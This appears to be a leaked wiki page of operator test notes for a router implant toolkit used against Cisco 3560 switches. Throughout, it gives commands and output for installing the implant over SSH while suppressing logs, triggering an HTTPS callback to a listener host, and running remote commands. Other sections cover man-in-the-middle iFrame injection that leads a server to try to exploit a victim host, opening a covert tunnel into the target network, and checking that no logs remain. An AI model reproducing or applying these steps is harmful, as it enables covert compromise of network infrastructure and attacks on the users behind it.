
                        Owner: User #1179928
JQJSlasher - Ops Testing
Cisco - 3560   IP:192.168.200.10
ICON-CT: 172.20.12.29 / Seeds Host 192.168.32.10 - VLAN32
Testing to focus on the following capabilities:

Install
Trigger
Shell access
MITM iFrame injectionSmoke Test Install / Functionality test 


Install HG (no AAASecurity Server from Cisco) / Set up basic comms with implant
Un-tar delivery to ICON: /home/user1/slasher-2h_20150725/bin/ops/slasher-2h/

Change ../slasher-2h/remote/data/config/npc3/target.py interPacketTime to 0.1 seconds
nano ../ops/slash/slasher-2h/hg/slasher-2h.txt 
Change Interface = eth0
Change Trigger address = 192.168.32.10 (Seeds host)


Attack w/ SSHIAC from ICON: ./sshiac --ip 192.168.200.10:22 --l cisco:cisco password
LGEC -125DHEC -60
EC -159M


#cd ../../remote/
source aliaeses
remote>broad
./seq set 1
remote>broad = GOOD - status OK
nano target-aliases
Change target ip = 192.168.200.10
ProcID = 0x10423185


Ran: ../slasher-2h/hg# ./prep-ct.sh= "File copy complete. CutThroat is ready for use."

remote>hg_start
= done, GOOD - status OK
Result: 0xfffffffb (on 3560-24 #1 - stopped testing and tried 2nd switch from step 5)
Result: 0x00000001 (on 2nd 3560-24)


Make listen window:
./cutthroat ilm_hg.so
ilm listen slasher-2h.txt


Make trigger window:
./cutthroat ilm_hg.so
ilm trigger slasher-2h.txt
beacon call_base_back https 172.20.12.29 443SSL Handshake completes in listen window






Test basic functionality of initial installIn listen window> modeule show
= All modules running after initial install
= All commands tab out




Test HG Install with AAASecurity Server from Cisco configured similar to target device
Configure 3560 with AAASecurity Server from Cisco settings from target config
Save config and reload 3560 target to start with a clean switch
Test ssh to confirm AAASecurity Server from Cisco works natively:ssh -l root 192.168.200.10
password: password
>en = password
= successful login



Attack with SSHIAC

./sshiac --ip 192.168.200.10:22 --l root:password passwordLGEC -122E gs failedE


./sshiac -c  --ignor --ip 192.168.200.10:22 --l root:password password

BUILD NUMBER: SSH-415-P
username: larry password: password enable: password IP: 192.168.200.10:22 ignore logging
press ENTER to continue or Ctrl-c to stop
LGEC -122E gs failedE


 ./sshiac -v -d --forceenable --confirm --ignorelog --ip 192.168.200.10:22 --l root:password password





BUILD NUMBER: SSH-415-P
username: root password: password enable: password IP: 192.168.200.10:22 verbose debug force enable mode ignore logging
press ENTER to continue or Ctrl-c to stop
L3560-target>3560-target>3560-target>enPassword: 3560-target#term len 0x03560-target#term width 03560-target#show proc | i Virtual Exec|SSH 89 M* 0 378 171 2210 9728/12000 1 SSHSecure Shell Process  270 Mwe 12EAAE4 25 36 694 5040/6000 0 SSHSecure Shell Event handle3560-target#3560-target>3560-target>3560-target>enPassword: 3560-target#show regionCommand authorization failed.
3560-target#term len 03560-target#show proc | i Virtual Exec|SSH 89 ME 2462A4 496 172 2883 9728/12000 1 SSHSecure Shell Process  266 M* 0 370 169 2189 9724/12000 2 SSHSecure Shell Process  270 Mwe 12EAAE4 25 36 694 5040/6000 0 SSHSecure Shell Event handle3560-target#Gshow users | i \** 2 vty 1 root idle 00:00:00 172.20.12.293560-target#show ver | i IOS\ |BOOTLDR:Cisco IOSApple operating system for small devices Software, C3560 Software (C3560-ADVIPSERVICESK9-M), Version 12.2(37)SE, RELEASE SOFTWARE (fc2)BOOTLDR: C3560 Boot Loader (C3560-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)3560-target#show stacks 266Command authorization failed.
3560-target#EC -122E gs failedexitexitE
**********************************************************************
Thursday 8/6/15 - User #77434 Testing
*Unsure where exactly where User #? left off, reloaded the 3560, attempted to re-attack

SSHIAC attack  
Result w/no flags:ttack/linux$ ls sshiac user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$ ./sshiac --ip 192.168.200.10:22 -l cisco:cisco password L ECEdgeCase -76
EC -129 E user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$


Result with flags:
user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$ ./sshiac -v -d --forceenable --confirm --ignorelog --ip 192.168.200.10:22 -l cisco:cisco password BUILD NUMBER: SSH-415-P
 username: cisco  password: cisco  enable:   password  IP:  192.168.200.10:22  verbose  debug  force enable mode  ignore logging
press ENTER to continue or Ctrl-c to stop
L ECEdgeCase -76
EC -129 E


Result when not being stupid and using the right username / password:
root@slasher-icon:/home/user1/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux# ./sshiac -v -d --forceenable --ignorelog --ip 192.168.200.10:22 --l root:password password BUILD NUMBER: SSH-415-P
 username: root  password: password  enable:   password  IP:  192.168.200.10:22  verbose  debug  force enable mode  ignore logging
press ENTER to continue or Ctrl-c to stop
EC -60
EC -159 exit M




Successfully used Remote to install HG:  


 Set sequence number and broad: [target:192.168.200.10] remote> ./seq set 1 608 -> 1 [target:192.168.200.10] remote> broad 

GOOD - status OK. OP: BROADCAST Target NEXT -->2<-- IACInternational Access Code Software Version 41.5 (Arch: PPCPowerPC (IBM))   Target Software (C3560-ADVIPSERVICESK9-M), Version 12.2(37)SE
                       Proc ID: 0x10423191                  Next Sequence: 0x2



 [target:192.168.200.10] remote> hg_start
GOOD - status OK. OP: RUNCODE using Per Second     Code address: 0x03287d98     No data     Result: 0x00000001



NOTE - Recreated User #?'s steps 6-8 from above, no need to list it all out
 

************************************************************************************
Friday 8/7/15
Installed 3560-48port in place of 24-port target switch above. Loaded 12.2(37) SE IOSApple operating system for small devices on it and copied over previous config.


Attacked 3560-48TS-S without AAASecurity Server from Cisco configured on switch successfully ./sshiac -v -d --confirm --forceenable --ignorlog --ip 192.168.200.10:22 --l cisco:cisco password 
= all modules up and running after installing HG and getting comms.
reloaded switch to remove HG



Configured AAASecurity Server from Cisco on target 3560-48TS-S switch just as the target config is configured.Tried several syntaxes of ./sshiac, however, the only one that worked was as follows:
./sshiac -c --ignor --ip 192.168.200.10:22 --l root:password password
BUILD NUMBER: SSH-415-P
username: root password: password enable: password IP: 192.168.200.10:22 ignore logging
press ENTER to continue or Ctrl-c to stop
LGEC -125DHEC -60
EC -159M


cd ../../remote/
Prior to HG install, target CPU= 60s - 5% w/ 35% spike, 60min - 5% w/ 35% spike, 72hrs - 35% average with 70% spikes
source aliaeses
remote>broad
./seq set 1
remote>broad = GOOD - status OK
nano target-aliases
Change target ip = 192.168.200.10
ProcID = 0x13022407


>hg_start, CPU = 60s - 21% spike


Show Memory on target:                  Head              Total(b)      Used(b)     Free(b)       Lowest(b)   Largest(b)Processor  20BE480        91495296  20857396   70637900  69931132   69881184 I/O             7800000         8380416    3587852    4792564     4711952     4791152Driver te    1400000         1048576    44              1048532     1048532     1048532

No additional logs, No additional commands in "show history", No logs on TACACS+ for "root"


In listen window on ICON> ./cutthroat ilm_hg.soilm listen slasher-2h.txt    = Listening for clients on port 443

In trigger window on ICON> ./cutthroat ilm_hg.so
ilm trigger slasher-2h.txt
>beacon call_base_back https 172.20.12.29 443
Listen window does SSLSecure Socket Layer handshake to establish comms


In Listen window - >module show = all modules running 

HG Listen> modeule start FilterBroker.modmodeule show = FilterBroker running


HG Listen> module start default:ACEMod.modmodule show = ACEApplication Control Engine (Module) running





Run series of ACEApplication Control Engine (Module) exec (shell) commands from HG listen window
HG Listen> cmd exec "show run"
HG Listen> cmd exec "sh config"
HG Listen> cmd exec "sh vlan"
HG Listen> cmd exec "sh user"
HG Listen> cmd exec "dir flash"
HG Listen> cmd exec "sh clock"
Enter a native command that requires a series of commands:
HG Listen> cmd exec "sh ip int br"
HG Listen> cmd exec "sh configuration id"
HG Listen> cmd exec "sh dhcp server"
HG Listen> cmd exec "sh int switch"
HG Listen> cmd exec "sh int counters"
HG Listen> cmd exec "sh int counters errors"
HG Listen> cmd exec "sh int accounting"
HG Listen> cmd exec "sh int irb"
HG Listen> cmd exec "sh int mtu module 1"
HG Listen> cmd exec "traceroute 1.1.1.1"  = success, with traceroute output
HG Listen> cmd exec "ping 1.1.1.1" = success with round trip statistics
HG Listen> cmd exec "traceroute 3.3.3.3" = successful in that output shows to a destination that cannot be reached
HG Listen> cmd exec "ping 3.3.3.3" = successful in that out put of 0 replies is received
Execute invalid commands and verify they fail gracefully:
HG Listen> cmd exec "show test"
HG Listen> cmd exec "sh home"
HG Listen> cmd exec "traceroute 3.3.3.3"
ssh back to target 3560 and confirm that Tacacs logs the connection. Run "sh history" and verify no commands executed via HG show.
No console messages, no logs, no SNMPSimple Network Management Protocol traps




SMITE iFrame injection

HG Listen> mitm create http_iframe 192.168.21.10 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk

>mitm show = confirms rule is active
Clear browsing history on target host
Browse to X.X.X.XX (LVLT-GOGL-8-8-8[US]) --> receive normal web page
Iframe is injected into web page, viewed in source URL
Windex server attempts to exploit SEEDS host
Cleared browsing cache on SEEDS host, reloaded page
iFrame is injected again into web page, vewed in source URL

>mitm delete 1  = removed mitm rule
>mitm show  = no rules found
Clear cache on SEEDS host, reload page  =  no/no iFrame injection



mitm create http_iframe 192.168.32.10 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -ac 3 -en -bc -bk (Creates 3 iFrame injections)


Clear browser cache and reload target browser = iFrame injection
Clear browser cache and reload target browser = iFrame injection

Clear browser cache and reload target browser = no/no iFrame injection as expected

>mitm delete 2  =  rule is removed
No console messages, no logs, no SNMPSimple Network Management Protocol traps





Drillbit / Tunnel
HG Listen>web get_snooped_host_list_client 0 0= Seeds host shows in snooped list w/ 192.168.32.10 / 0050.5688.9754 / VLAN32 / Next-hop MACApple Operating System 0024.98AD.CBC3

nano .../slasher/slasher-2h/hg/tools/dualor/config/dualor-endpoint.iniChange Protocol = CommsW  &  Interface = eth0

Create Dualor Listen Window > cd ../slasher/slasher-2h/hg/tools/dualor/linux./Dualor ../config/dualor-endpoint.ini  =  Listening for client on port 80


HG Listen>module start default:CovertTunnel.mod  = successful startHG Listen> module show = Tunnel module now running

Create Dualor Trigger window > cd ../slasher/slasher-2h/gh/tools/dualor/config
nano dualor-callback.iniTapIPAddr = 192.168.32.11 / Protocol = CommsW / VLANVirtual Local Area Network = 32 / OpenSession_WEB IP = 172.20.12.29

cp dualor-callback.ini ../../../   (to hg folder)

HG Listen>tun init dualor-callback.ini
= Tunnel establishes on Dualor Listen window

Accepted new client connection (192.168.32.10) on interface (172.20.12.29) eth0Performing authentication on new client connectionPerforming key exchange with the tunnel endpoint...Successfully performed key exchange with the tunnel endpoint!Connected with device UID: 002498adcb80Opened the TAPVirtual Network kernel device interface tap0Setting the tap0 interface status to down
tap0 Interface Parameters: IP Address: 192.168.32.11 Subnet Mask: 255.255.255.0 MACApple Operating System Address: 00-27-19-48-00-85
Setting the tap0 interface status to upTunnel is now active



ICON> route add -net 192.168.32.0 netmask 255.255.255.0 dev tap0
route -n  =  route to target VLANVirtual Local Area Network via Tap0 interface
HG Listen> tun show= Tunnel Session ID#1 with tap address of 192.168.32.11

Start Wireshark on Tap0
ICON>route add -net 192.168.200.0 netmask 255.255.255.0 dev tap0ICON>ssh cisco@192.168.200.9  =  confirm that ssh traffic is traversing Tap0 and that ssh connection establishes


Add-hoc tunnel test:
Start ping from ICON to 192.168.200.26. Ensure that it's capturing on Tap0 interface in Wireshark
Console to 3560 Target and shut down G0/2
= pings fail and starts to ARPAddress Resolution Protocol for 192.168.200.26 and never receives a reply
>tun show = no active tunnel
Must Cntrl-C to force close tunnel, re-establish tunnel
Starting pings again is successful once OSPFOpen Shortest Path First re-converges


"no shut" G0/2 on target  =  pings still continue even as link goes from "loading" to "full" in OSPF


HG Listen>tun close #  =  tunnel closes
HG Listen>tun show  =  no tunnel
ICON> route -n  =  no more Tap0 routes



ACL Analysis
Acess-list 10 only permits NTPNetwork Time Protocol from peers 192.168.73.16, 192.168.73.32, 192.168.18.145
Access-list 20 only permits vty access to 3560 vty 0 15 from 192.168.73.3, 192.168.73.10, 192.168.18.146, 192.168.18.145
Access-list 30 permits snmp to community "@m0n1t0r1ng" IP's 192.168.18.143 - 145
Acceess-list 53 permits snmp v3 priv to 192.168.253.5, 172.16.13.11, and 172.16.10.11
Access-list 99 permits snmp v3 auth to 192.168.18.67



OSPF manipulation 
Take down preferred path so OSPFOpen Shortest Path First fails over to redundant link
....



Attack 3560 target from an IP that is not logged in target space without the sshiac --ignorlog flag
Reload target 3560 to start with clean switch
Confirm SNMPSimple Network Management Protocol traps being sent by shut / no shut uplink interface

ICON> ./sshiac -c --ip 192.168.200.10:22 --l root:password password   
BUILD NUMBER: SSH-415-P
username: root password: password enable: password IP: 192.168.200.10:22
press ENTER to continue or Ctrl-c to stop
LEC -144E l o g failedE



ICON> ./sshiac --ip 192.168.200.10:22 --l root:password password (syntax from readme)
LEC -144E l o g failedE


ICON> ./sshiac -c --ignor --ip 192.168.200.10:22 --l root:password password
BUILD NUMBER: SSH-415-P
username: rootpassword: passwordenable: passwordIP: 192.168.200.10:22ignore logging
press ENTER to continue or Ctrl-c to stop
LGEC -125DHEC -60
EC -159M





 
 
 
 
 

Previous versions:
| 1 empty
| 2 
| 3 
| 4 
| 5 
| 6 
| 7 
| 8 
| 9 
| 10 
| 11 
| 12 
| 13 
| 14 
| 15 
| 16 
| 17 
| 18 
| 19 
| 20 
| 21 
| 22 
| 23 
| 24 
| 25 
| 26 
| 27 
| 28 
| 29 
| 30 
| 31 
| 32 
|
                    